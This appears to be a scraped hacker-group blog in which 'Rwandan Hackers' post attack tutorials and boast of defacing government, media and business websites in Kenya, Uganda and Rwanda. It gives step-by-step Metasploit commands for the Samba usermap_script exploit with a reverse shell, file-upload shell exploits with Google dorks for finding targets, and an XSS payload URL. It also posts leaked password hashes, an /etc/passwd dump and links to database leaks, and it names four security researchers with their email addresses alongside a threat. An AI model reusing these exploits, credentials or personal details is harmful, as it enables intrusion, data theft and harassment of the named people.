Extracting MetaData from photos using exiftool

                                              Hello Rwandans !!!!!

In this post I will show you how to extract metadata from photos to see exactly where you took the photo


Also note that this method is used to solve many "crimes" for conducting a forensic analysis of an image, you can get the REAL data and the EXACT time and date, time, location, name of the camera, the date of issuance if the image was edited and all other options in it,
which leads to achieving tangible results

So the tools is located in the menu structure under Digital Forensics, or through the:

Aplicaciones - BackTrack - Forensics - Forensics Analysis Tools - Exiftool

The image I used is called fotografia.jpg is in the images folder

The route is as follows: ~ / images / fotografia.jpg

The command is:. / Exiftool-a ~ / images / fotografia.jpg

You can see a lot of data, such as the date and time the image was taken and everything else I mentioned above, in addition to the photo was taken from a SAMSUNG


In this case, we want to know the location of where the photo was taken, if you copy the GPS data, which are:

GPS Latitude: 42 ° 24 '54 .91 "N
GPS Longitude: 83 deg 25 '21 .36 "W
GPS: 42 ° 24 '54 .91 "N, 83 ° 25 '21 .36" W


As we can see, this photo was taken at Laurel Park Dr Livonia, MI 48152, USA
A cool thing to do is take pictures of Facebook and use this method to find GPS coordinates.

Enjoy

                                                          RWANDAN HACKERS

Exploiting Samba Server On Backtrack 5

Aim
-The main aim of this tutorial is to exploit the samba server .
Indentifying Samba Services
To Identifying Samba Services running on Remote System we use nmap .
Command Used : nmap -sV 192.168.118.138
After scanning , it shows the port 139 and port 445 uses Samba services .
See the below image for more details -

Msfconsole
Open msfconsole through a terminal .
Command Used : msfconsole
After enter the command, your ' msfconsole ' will open as shown below

Search Samba Exploit
To Search Samba Exploit , enter the command given below -
Commans Used to search samba exploit : search samba
As you press enter key , it shows the different exploits related to samba .
From the exploits select one which is highlighted in the below image -
See the below image for more help  

Use Exploit
Exploit Used : use exploit/multi/samba/usermap_script
See the below image for more details



Show Options
Command Used : show options
This command shows that RHOST is not set . So the next step is to set the Remote Host .
See the below image for more details

Rhost
Command Used : set RHOST <Remote Ip Address >
See the below image for more details



Payload
Command Used : show payloads
See the below image and  set the highlighted payload.
See the below image for more details

Set Payload
Command Used : set payload cmd/unix/reverse


Show Options
Command Used : show options
Now set the LHOST (local host address)

Set LHOST
Command Used : set LHOST < Your IpAddress >



Lport
Command Used > set LPORT 445

Command Used
After getting session , you can use commands as shown below -
See the below image -

A picture of President Kagame of Rwanda labelled a war criminal by the hackers into the Agriculture Ministry website

A picture of President Kagame of Rwanda labelled a war criminal by the hackers into the Agriculture Ministry website


The ministry of agriculture website has been pulled down after hackers infiltrated it and posted messages calling for presidents Yoweri Museveni of Uganda and Paul Kagame of Rwanda to stop supporting war in the Democratic Republic of Congo. Story (3 Files) The ministry of agriculture website has been pulled down after hackers infiltrated it and posted messages calling for presidents Yoweri Museveni of Uganda and Paul Kagame of Rwanda to stop supporting war in the Democratic Republic of Congo.

The hackers, one of whom identifying himself as Jeannot Kabuya, posted a string of statements written in French and calling for an end to the violence in DR Congo.

Some of the messages posted on the site, www.agriculture.go.ug, say Congo is not for sale.

The hackers also posted a string of pictures labeling the two presidents as well as Congolese rebel leader Bosco Ntaganda as killers who are wanted for war crimes. Ntaganda has been heading the M23 rebels who in April this year launched a rebellion against the Joseph Kabila government.

Other messages posted on the site says the hackers are anonymous, they do not forgive and they do not forget.

Connie Achayo, the agriculture ministry spokesperson says that they have decided to pull down the website as they investigate the origin of the messages and possible motive of the hackers.

Fred Opolot the director at the Uganda Media Centre says he is aware of the move by hackers but is getting in touch with the public relations officer at the ministry of agriculture to pull down the site.

Earlier, Information minister Mary Karooro Okurut said she was not aware of the development but was getting in touch with the ministry officials to furnish her with details.

President Kagame of Rwanda and Kabila of DR Congo are expected to meet Museveni in Kampala on Tuesday this week to try and ease tension in the region. Congo accuses Rwanda of supporting the M23 rebels, a claim Rwanda dismisses.

On February 29th this year, the website of the Ministry of Works was briefly pulled down after a hacker posted a picture of FDC leader Kizza Besigye seated on a stool in a pensive mood. The image stayed on the site for several hours until the website was pulled down at about 5pm.

In May 2010, a hacker going by name Kaka Argentine posted a photo of Adolf Hitler with a Nazi party symbol on his chest on the State House website. In 2010, hackers calling themselves “the Ayyildiz team” posted pro-Palestine items on the website of the Ministry of Defence, accusing Israel of killing innocent Palestinians.

DiyWeb Admin Bypass and Remote file/shell Upload exploit

Exploit title : DiyWeb Admin Bypass and & file Upload exploit
Discovered By : NoentryPhc
Sever : windows
Type : web application
Shell extention : .asp

Dork : "Power by DiyWeb"
            inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
This exploit's almost all vulnerable websites are Malaysiyan.
To upload your files Goto : http://www.website.com/diyweb/menu/admin/image_manager.asp

and upload your shell/deface there !
if .php extention is not allowed then your can try tamper data and live http headers
to acess your file goto : http://www.website.com/Images/yourfilehere and sometimes you have to find your manually on websites

Link:http://www.famosapadu.com.my/images/index.html

Google website's Vulnerable to XSS

Link:http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert%28%27XSS-BY-RWANDAN-HACKERS%27%29%3C/script%3E

we discovered a cross site scripting(XSS)
vulnerability in google website.we already reported the vulnerability to google security expert

Biochemistry - Makerere University website HACKED !!!

 Link:http://biochemistry.mak.ac.ug/start/index.php

Makerere University Department Of Biochemistry hacked by Rwandan Hackers

Dedications to "UGANDAN HACKERS"

                                                            ADMIN PANEL

       

National Oil Corporation of Kenya Defaced by Rwandan hackers

HACKED LINK:http://www.nockenya.co.ke/images/hacked.html


National Oil is state corporation under the Ministry of Energy incorporated in April 1981 and charged with participation in all aspects of the petroleum industry. National Oil has a 100% Government of Kenya shareholding.
National Oil became operational in 1984 and its initial operations were limited to exploration activities delegated from the Ministry of Energy. In 1988, National Oil went downstream and actively started participating in the importation and sale of petroleum products including crude oil, white fuels, lubricants and LPG.
The formation of National Oil was precipitated by the oil crisis of the 1970's(1973/74 and 1979/80) and the correspondent supply disruptions and price hikes which resulted in the country's oil bill comprising of almost one third of the total value of imports and therefore making petroleum the largest single drain of Kenya's foreign exchange earnings.
National Oil was therefore born out a need by the Government of Kenya to have greater control of the petroleum sector which is a crucial determinant of the country’s economic performance. National Oil has since remained the Government’s policy instrument in matters related to oil specifically in the upstream exploration of oil and gas, mid-stream development of petroleum infrastructure and downstream marketing of petroleum products including motor and industrial fuels, lubricants, LPG and related motor consumables and hardware.

                                                       WE ARE BACK KENYA !!!

Orinfor.gov.rw hacked #database Leaked

VULNERABILITY DESCRPTION:

Apache httpd Remote Denial of Service
Vulnerability description
A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tools has been observed. The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.


This alert was generated using only banner information.

Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).

This vulnerability affects Web Server.
Discovered by: Scripting (Version_Check.script).
Attack details
Current version is : 2.2.8

Some message and ip addresses from orinfor

SERVER INFO:
Target:http://www.orinfor.gov.rw/
Host IP:41.74.172.227
Web Server:Apache/2.2.8 (Ubuntu)
DB Server:MySQL
Resp. Time(avg):1406 ms
Current User:datareader@localhost
Sql Version:5.0.96-0ubuntu3
Current DB:orinfordb
System User:datareader@localhost
Host Name:orinfor-webbackup
Installation dir:/usr/
DB User & Pass:root:*9E98C0F798B9FD4DFA49B179794DCF6CA54A33F9:localhost
root:*9E98C0F798B9FD4DFA49B179794DCF6CA54A33F9:orinfor-webbackup
root:*9E98C0F798B9FD4DFA49B179794DCF6CA54A33F9:127.0.0.1
::localhost
::orinfor-webbackup
debian-sys-maint:*D01D02EC3BE8C42F723915A3F8C36D906032D19B:localhost
datareader:*850D7998C8CE8E017B83A5DB0B8F82305246A875:localhost
Data Bases: information_schema
   mysql
   orinfordb


ADMIN PASSWORD 

Table:orinfor_users
Total Rows:5
username             password
imvaho      fe4cdddb852bc8d0df32cb05fb733a5e
lnr              93892f345b15f01bdc8c9c267c1eb5ca
news              d266b45c5d67eae03ce857161f06119c
radio               9276df22aacecc2028fe854c795c3c6d
sylvain       ba6a80be17af442b55003d73f5aaee5b


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:105:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
orinfor:x:1000:1000:orinfor,,,:/home/orinfor:/bin/bash
ftp:x:106:65534::/home/ftp:/bin/false
mysql:x:107:115:MySQL Server,,,:/var/lib/mysql:/bin/false

Rwandan diaspora website hacked by Rwandan Hackers #GOV.RW

Rwandan diaspora website have been hacked by Rwandan Hackers
Link:http://jobs.rwandandiaspora.gov.rw/cv/34testRwandanhackers.txt


Vulnerability description
Manual confirmation is required for this alert.


This page is using a weak password. . A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name or common variations on these themes. 
Affected items
/profileloginconfirm.php 
The impact of this vulnerability
An attacker may access the contents of the password-protected page.


How to fix this vulnerability
Enforce a strong password policy. Don't permit weak passwords or passwords based on dictionary words.

Igihe website infected with malware

It seems that the site igihe.com was infected by a Russian hacker
because igihe.com was redirected to a website host in Russia http://ilulxak.ru /http://nycaqsy.ru .


We wrote an article on vulnerabilities found in igihe.com website some days ago
http://rwandan-hackers.blogspot.fr/2012/07/igihecom-vulnerable-to-xss.html

I think the hacker used this exploit

http://www.exploit-db.com/exploits/9448/ [SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit]

https://badwarebusters.org/main/itemview/7997 [more advice Here ]


I think you’ll find that the site has been compromised because of a leaked password.
Several infections seem to exist on the site.

First of all, check the administrative PC for malware, use multiple AV and Malware scanners to check and remove any found.

Change the password of the FTP, preferably from an alternate PC.

Do NOT store the password in your FTP client.

Find and remove the malware that is on the site:
Your .htaccess file may redirect search engine traffic, so please check the .htaccess file in all folders including above the root folder of the site itself.
You’ve also got a Martuz or variant thereof, so you will likely find iframe or malicious scripts embedded in the various files of your site. Check both normal html/php file as well as Script files.

When all is done and found, you can request a Review from Google Webmaster Tools. This review will take a few hours, but if no suspicious activity is found, then the site will be taken off the suspicious list.

Tools you may find useful, including website scanners:
http://badwarebusters.org/main/itemview/1659#itemblock-3035

Google webmaster tools:
http://www.google.com/webmasters/tools/

Your Diagnostics page:
http://www.google.com/safebrowsing/diagnostic?site=http://igihe.com

The website is under construction

update at 00:12 August 4, 2012:

I saw that they copy this article to explain the nature of the virus

next time do your work and stop copying our work

http://www.igihe.com/igihe-com/the-igihe-project/ubutumwa-bwo-kwisegura-ku-bakunzi-ba-igihe-com.html

www.goviago.com Pown3d By Rwandan Hackers

ADMIN PANEL 

 Goviago hacked by Rwandan Hackers

Go Ltd is a new technological lighted splint raised in 2011; and registered by RDB as a legal IT company. It is new but with excellent performance. GO Ltd has a target of empowering creativity and innovation in technology in Rwanda.
The company is now owned by three entrepreneurs:
SHIKAMA Dioscore, Founder and CEO
MANISHIMWE Alexis, Founder and Human Resources Officer(HRO)
NIYIKIZA Aimable, Co-founder and Technical Director.

Our team is composed of, among others;
1. Eng.RURANGWA Thadée, Assistant Technical Director
2. Eng.Rusa Richard, Head of DDGD (Department of Developers and Graphic Designers)
3. Eng.Niyigena Diogène, Head of DETE(Department of electronics and Telecommunication engineers)
4. HITIMANA N. Emmanuel, Media Analyst

SERVER INFO:
Target:http://www.goviago.com/
Host IP:50.116.99.167
Web Server:Apache
DB Server:MySQL >=5
Resp. Time(avg):517 ms
Current User:goltd@localhost
Sql Version:5.5.23-55
Current DB:goltd_govi
System User:goltd@localhost
Host Name:gator1873.hostgator.com
Installation dir:/usr
DB User: goltd'@'localhost'
Data Bases:information_schema
         goltd_govi

                           MESSAGE TO ADMIN: PLEASE CHANGE THE PASSWORD !!!

Admin Username and Password

WestFm kenya and twendetwende.co.ke Hacked #Dedication to "Kenyan cyber seurity expert"

westfm kenya and twendetwende.co.ke have been hacked by Rwandan Hackers

westfm link:http://westfm.co.ke/index-page-ictcenter.htm

twendetwende link:http://www.twendetwende.co.ke/hotel.php?id=12


West Fm is an independent commercial radio station that is fast growing and a favorite to the population of Western Kenya, North Rift and Eastern Uganda. The station started broadcasting in July 2006. Rating reports from Steadman justify that, the station has rapidly captured the imagination of the people within the region and stands in a league of its own.

West Fm offers comprehensive programs. We focus on issues that affect the region thus; we speak to the community directly as well as giving them a platform to tackle issues affecting their daily lives on radio. As the Region’s fast growing and favorite radio station, West Fm 94.9 & 104.1 will give your products a significant exposure during prime listening times on an exclusive basis.

http://www.twendetwende.co.ke/hotel.php?id=12

Durpal IMCE Mkdir remote deface upload exploit by Rwandan Hackers

IMCE Mkdir is a remote file upload vulnerablity on durpal platform,

normaly you can upload .txt extentions on websites

but some sites allowes you to upload .html files

if you want to upload shell on website then try in .phtml extention

Google Dork : inurl:"/imce?dir=" intitle:"File Browser"

exploit : http://website.com/imce?dir= 

Shell Access : http://website.com/files/yourfilehere 

                      http://www.website.com/abc/files/abc/yourfilehere

1st of all find a vulnerable website using google dork 

after opening site goto http://website.com/imce?dir= 

and file upload option there

to acess your shell/deface/file go here
http://www.website.com/abc/files/abc/yourfilehere
(replace abc with directory of website)
My deface page  :http://labourlakesandfurness.co.uk/sites/labourlakesandfurness.co.uk/files/rwandanhackers.html

Leave comment if any query :) stay connected for More !

National Environment Management Authority Hacked #little message to "kenyan cyber security expert"

National Environment Management Authority hacked 

the Database leaked in a pasterbin note

Link:http://pastebin.com/nyaywc8T

Little message to" kenyan cyber security expert":

This post is dedicated to:

BRIGHT GAMELI 

brightzeed@gmail.com

Gichuki John Chuksjonia

chuksjonia@gmail.com 

Fredrick Wahome

frewah85@gmail.com 

Dennis Kioko

 dmbuvi@gmail.com 

and others I forgot to mention

My message is that:

You spend your time criticizing us that we are "script kiddies",

yes I assume I am one and ,I want to say that the Rwanda can have hackers because 

you said that "it's kenyan hackers"behind a mask of "RWANDAN HACKERS",

I want to say that unfortunately I am Rwandese and i'm proud to be RWANDAN.

Because of  you I am going to rot the Kenyan websites ;)

Thank you to you for your encouragement

next time I'll rot your lives men :)

WE ARE RWANDAN HACKERS 

My internet speed

www.future.co.ug Pown3d !!!

Link:http://www.future.co.ug/newsevents.php
ABOUT US:
"Future Technologies Limited is the leading provider of computer education in Uganda. In order to achieve our objective of providing quality higher education, we have made unique partnerships and strategic alliances with the global leaders in the IT education field.

Our alliance partnership with Aptech Worldwide brings a unique delivery of IT career courses that fully equips students to gain complete confidence to meet any challenges in IT industry. Aptech Uganda, where more than 9,000 students have been trained is among the premier Aptech centers across the world. Aptech is acclaimed as the leading IT training institution in the world with a network spreading across 54 countries, connecting over 3,200 locations, providing a wide range of educational programs.

Future Technologies is one of the largest Microsoft Certified Competency Learning Centers in the region. This is the highest level of accreditation provided to Microsoft Partners who have demonstrated the highest level of expertise in I.T. skill delivery and have world-class infrastructure. Courses are delivered in its original form, and students get the Microsoft Official Curriculum kits and the course participation certificates from Microsoft.

Our association with Oracle University as the Oracle Approved Education Partner makes us authorized to conduct training using the official curriculum of Oracle University. Oracle University accredited institutions are the only ones authorized to conduct Oracle training using the official curriculum from the Oracle University, designed by Oracle to deliver the training in original technology and style.

Our association with CompTIA (Computer Technology Industry Association) as the CompTIA Learning Alliance Partner enables us to deliver platform independent technology learning. CompTIA is the largest developer of vendor neutral IT Certification Courses in the world.

Future Technologies houses an Authorized Prometric Testing Centre (APTC) enabling students and professionals to appear in online testing for certification process by various vendors.

Our Enterprise Training and Solutions (ETS) division offers software development and implementation services and corporate training.
Our association with Arena Multimedia, the Asia’s leader in Multimedia education, enables us to deliver various multi-media courses in the region.

All the above alliances and tie-ups make us the unique player in the IT industry in the region."

to enter in the control panel I haven't needed a password  ;)

Energy Regulatory Commision Kenya Hacked !!!!! #OPKENYA

To start we aren't kenyan hackers hide behind the mask"Rwandan hackers",
We are Rwandan Hackers and we are Rwandese,we love Rwanda..

After Kenya Broadcasting Corporation"www.kbc.co.ke"
I thought why not a government website??
and I chose this one www.erc.go.ke

Admin Panel

it's just the beginning for security expert from kenya  #
WE LOVE RWANDA

Kenya Broadcasting Corporation Database Leaked #OPKENYAMEDIA

To start we aren't kenyan hackers hide behind the mask"Rwandan hackers",
We are Rwandan Hackers and we are Rwandese,we love Rwanda

Kenya Broadcasting Corporation"www.kbc.co.ke" Hacked by Rwandan Hackers [RWH]
The database has been hacked and exposed by Rwandan hackers
About 2934 account,Email and passwords were leaked, but since all the passwords are in clear text(not crypted),also server details
DATABASE LINK:http://pastebin.com/5hN3Y9Nk

MEMBERS DETAIL

www.hortinews.co.ke Owned !!!!!! #OPkenyamedia

Horticultural News have been hacked by Rwandan hackers
LINK HACKED:http://www.hortinews.co.ke/article.php?id=447
ADMIN PANEL:

#OPKENYAMEDIA START ;)